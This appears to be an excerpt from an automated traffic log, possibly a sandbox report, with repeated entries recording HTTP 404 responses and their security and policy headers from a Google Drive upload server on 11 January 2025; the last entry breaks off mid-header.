      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRdeUt8bdUq_4HxK-5PIFY0_M21CY6Ou0z4QK_BLnki3WbVCApnzLyop-9h3XYdbTsi2U7LIZ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:27 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-BxtnlgEUqo9CQAdAi_9dJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTsvZ5YG8_kx--AHuOva7NzYL1i08RPYiWIpef_iCTeDVhfOyBtB0GsA_2qf8PYEMKmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:29 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-kHN33lFu72BShGpW51I3gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4_zGRq38DJbxSjMEtoyzJ7nzRxVC8JPPIxpocg3HUVjrF9j_o21eD24yzMhQfBIQMQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:32 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-iRdevWkGAm8sdGXYbHy-_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXvR-tNun8oF6h2AJeaiM-s_JBDeo1NU9sAJFSmQacNubRX_LWFOvDadNiIAOsQr8xuGKw_9cContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Sr-QOMmIQmf3bT0lgyT03g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRra7MWenIshM3a-QP2-m8yXQFvprUxQzcmwhIrcVXR1PcE1StUuTPeV-Wo1ZGvFV5qvh2q58MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:36 GMTContent-Security-Policy: script-src 'nonce-7A2aM0fmOZd6YDBTFBZkMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSZyitYiO5EdNtK-X7LCxuP3F6eoV2fKRHBh9YP8rCDEI_bndV51fwn3pJnUjU7fGvqhFXdqWAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NXrNcZZndc15c350Ma_XUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQek9oxGzHmMKbubWnjsv59Va3Yul-Y0-icPFplRdWlxjvuF4aA3hr3ER2RAc-rnvhMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-yWbgOx3ZGeyd64PSbVuhbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4CtvgiuzNqD6Vp4OJIXMHd5AkBnmPak_yjkwBEC2qLo3aQqzH-pELs82C9NkGaZlM18Qir1bkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:43 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Dv_-MqUASgVv1_WCykdIkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTj8JpwWhEFWVkjuaiMhDXKL-ZHcYljt3uPUA7vCdeWVbbsFAhWrHngsJhYyhFhb1LDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-tBW8Fb9UJRGoHgcjviWd5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSHHEp5YFj3HNU3hqZ1s2vIpBX5B2251aM3rioI1an75eyF2MfLVVdNZ0fT78X3ewRjcBJ7XPAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VSNeLRql5daDZf_dYffKag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQILz_p_oTbhPoBahKB_UfXzbmKckVELPV23vZTVrk7MPddQrdnwJuqaQdUJr6Y5RJfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:49 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7WRZPqyN5fOr8bAbNk44qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQyHgAjAxauHLOq6dbMWfXdCljVvh2pk3hRHPiw7ehWZVrDhZa8Pu6O8dyotXL67rK2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nE6Y7UtAuzb2nycRDjQYGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQZpAqKQTmdyyG3Ej1Rs3p1D3qfZ3MW1VStHJTO1DTfIu42Ez8tzTFlGJ-wZbC4hQ78DGXeHg8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:54 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-1ScqGiQUimKOlJ_kxupGWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT3tmaIRFHm1yhh_0CGmJlVxbmGg9hIDyCfNxN2Bo6ZSpJu1Gumg7YZpR8OOIVWciubContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Mw7qU6iTU6ekF4mlPaJ7nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRdPOs9xyfsFG63nV1mt25njVJ_XT59WnRXpm6j5BWmyRcg7j-WzlRF_bcpyOQ-0ToSCzofaDsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fvE0Sq6ueHzbcP01s4468g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: 